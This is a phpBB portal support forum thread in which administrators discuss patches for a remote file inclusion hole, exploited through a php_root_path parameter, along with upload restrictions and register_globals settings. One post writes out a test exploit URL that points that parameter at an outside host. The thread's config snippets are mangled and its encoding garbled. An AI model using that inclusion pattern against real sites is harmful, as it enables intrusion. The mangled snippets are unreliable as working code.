Recent Hacking Discussion (continued...)

[Vadar]

OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).

While doing that I noticed something that looked strange to me. For the fix labled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");

For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');

Is that right?

For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... hp?sid=xxx

[computerz]

OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).

While doing that I noticed something that looked strange to me. For the fix labled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");

For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');

Is that right?

For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... 149ade22d2

in the die function it should be double quotes

[Michaelo]

One of us is confused...

Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.). There is no other way for a hacker to put a file on a server assuming they havent hack another site on the server in which case they may be able to cross contaminateà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

To hack a site first you need a way in, to accomplish this you need to find a vulnerable point an exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them accessà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases simply used a remote script hack tool to do thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

I have examined the possibility of restricting upload directories to only accept certain file such as images or zips in an effort to counter the cross contamination problemà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ more later on thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Mike

[Michaelo]

It can be single or double they are both treated as strings... I hope! <img>

[computerz]

One of us is confused...

Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.).

I was under the assumption that the scripts already contain this input validation. Then if not, you're saying that in addition to an avatar or a photogallery image, I can upload .pl, .tlc, .c etc? Because these are the files that I find in these directories. A filter for .pl, .tlc, .zip, .tgz, and .c would definitely be in order, because these are the file extensions the hackers are uploading.

There is no other way for a hacker to put a file on a server assuming they havent hack another site on the server in which case they may be able to cross contaminateà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

I'm not sure about this. I've seen it where one can put fget(), wget, or fput() commands into the URI.. but since we have phpbb_security installed that should stop that unless of course hackers have discovered a workaround.

To hack a site first you need a way in, to accomplish this you need to find a vulnerable point an exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them accessà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases simply used a remote script hack tool to do thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

agreed

I have examined the possibility of restricting upload directories to only accept certain file such as images or zips in an effort to counter the cross contamination problemà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ more later on thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Great! Can't wait to see what you have. <img>

[Michaelo]

computerz, You as admin determine what can be uploaded it's in the ACP allow upload file type or something like that.

If you have any other file/script it is a result of hacking...
You cannot send any type of command via the address...

Play around with this little htaccess info and see how it goes...

Code: Select all

 <Directory>        # Allow access to the root of the hosting folder     Options None     AllowOverride None     Order allow,deny     Allow from all     <FilesMatch>    # But only to files with the specified extentions  Order allow,deny  Deny from all     </FilesMatch>     <FilesMatch>  Order allow,deny  Allow from all     </FilesMatch></Directory>  

The root is you forum root... If you get it working place it in all upload directories...
Mike

[Solomon]

The "other site" claims phpBB_security 1.0.3 will not stop the recent hacks but that CrackerTracker will. I have no clue, this is why I am asking. This has nothing to do with Michaelo's fixes.

[computerz]

computerz, You as admin determine what can be uploaded it's in the ACP allow upload file type or something like that.

ahhhh.. i forgot about that, but isn't that only for the attachment control panel for the forums. In other words do those restrictions also apply to the smartor Photogallery, and the avatar image uploads?

you cannot send any type of command via the address...

Thats good to know

Play around with this little htaccess info and see how it goes...

Code: Select all

 <Directory>        # Allow access to the root of the hosting folder     Options None     AllowOverride None     Order allow,deny     Allow from all     <FilesMatch>    # But only to files with the specified extentions  Order allow,deny  Deny from all     </FilesMatch>     <FilesMatch>  Order allow,deny  Allow from all     </FilesMatch></Directory>  

will most certainly!

And if we succeed with this, I'll be the first to throw in a nice donation for your hard work!

[Vadar]

Just an update....

I'm seeing the same problem as in the ACP - Photo Album (Hacking attempt... Details Logged) in the ACP - Extensions block. Neither problem is a result of a hack, but rather the file modifications made as per Rev 5.

[angisson]

yeah, I put the patches on my site.. and now my chat system (the chat scip from the 5 dollar script place , lol)


as long as my site is safe I can live iwth out th chat, but I am woundering how I would fix it?

[ihammo]

Now I am confused

I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.

So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.

has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely

[ihammo]

Ok, I think I have worked it out. My provider has switched Register_Globals to OFF (without telling me!)

To test I replicated my site on a server at home and set Register_Globals to ON. With this the hacking code worked when trying the hack.

Then I set it to OFF and the hacking code didn't work, but the phpbb_root_path variable attempting to be passed in the URL was nowhere to be seen (i added code to display it in both circumstances)

So, with Register_Globals off is the functions.php exploit at all possible? I am guessing (hoping) not!

Thanks everyone!

[Solomon]

Now I am confused

I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.

So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.

has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely

I get the same result with Register_Globals ON or OFF:

Warning: main(./includes/functions_categories_hierarchy.): failed to open stream: No such file or directory in /home/XXXXX/public_html/forum/includes/functions.php on line 38

Warning: main(): Failed opening './includes/functions_categories_hierarchy.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXX/public_html/forum/includes/functions.php on line 38
[hr:2q2wbgp0]
Is this what I should get?

[ihammo]

When Register_Globals was OFF I got the exact same response as you Soloman.

I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.

However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL

I take it you do have direct contol over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code

Code: Select all

 <phpphpinfo>  

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache <img> ])

[Solomon]

When Register_Globals was OFF I got the exact same response as you Soloman.

I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.

However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL

I take it you do have direct contol over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code

Code: Select all

 <phpphpinfo>  

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache <img> ])

I'm toggling it via my .htaccess file and then verifying it in the ACP/Tool and/or ACP/Security section. Local toggles ON & OFF accordingly, and Master always stays ON because this is my host's shared server default.

.htaccess file string for servers where Master is default ON:

Local OFF desired

Code: Select all

php_value register_globals 0